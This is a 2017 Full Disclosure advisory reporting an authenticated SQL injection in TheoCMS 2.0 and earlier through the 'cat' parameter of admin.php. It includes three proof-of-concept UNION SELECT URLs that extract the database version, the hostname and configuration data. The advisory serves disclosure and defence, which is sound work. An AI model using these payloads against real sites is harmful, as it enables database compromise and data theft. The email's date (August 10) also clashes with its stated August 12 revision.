
Date: Thu, 10 Aug 2017 18:47:58 +0200
From: Manuel Garcia Cardenas <advidsec@...il.com>
To: fulldisclosure@...lists.org, dm@...urityfocus.com
Subject: [FD] SQL Injection in TheoCMS <= 2.0

=============================================
MGC ALERT 2017-004
- Original release date: July 11, 2017
- Last revised:  August 12, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
SQL Injection in TheoCMS <= 2.0

II. BACKGROUND
-------------------------
Theo CMS is an ultra lightweight Content Management System for all types of
websites.

III. DESCRIPTION
-------------------------
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code in the variable "cat" on the page
"admin.php".

IV. PROOF OF CONCEPT
-------------------------
The following URL's and parameters have been confirmed to all suffer from
SQL injection.

/theocms/core/admin.php?cat=0

POC:

/theocms/core/admin.php?cat=0+union+select+1,@@version,3,4+from+cfgs
/theocms/core/admin.php?cat=0+union+select+1,@@hostname,3,4+from+cfgs
/theocms/core/admin.php?cat=0+union+select+1,concat(cfg,data),3,4+from+cfgs

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
TheoCMS <= 2.0

VII. SOLUTION
-------------------------
Disable website until a fix is available.

VIII. REFERENCES
-------------------------
http://theocms.com

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
July 11, 2017 1: Initial release
August 12, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
July 11, 2017 2: Send to vendor
July 11, 2017 3: Vendor answer that is not a critical vulnerability an SQL
Injection y admin page
August 12, 2017 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/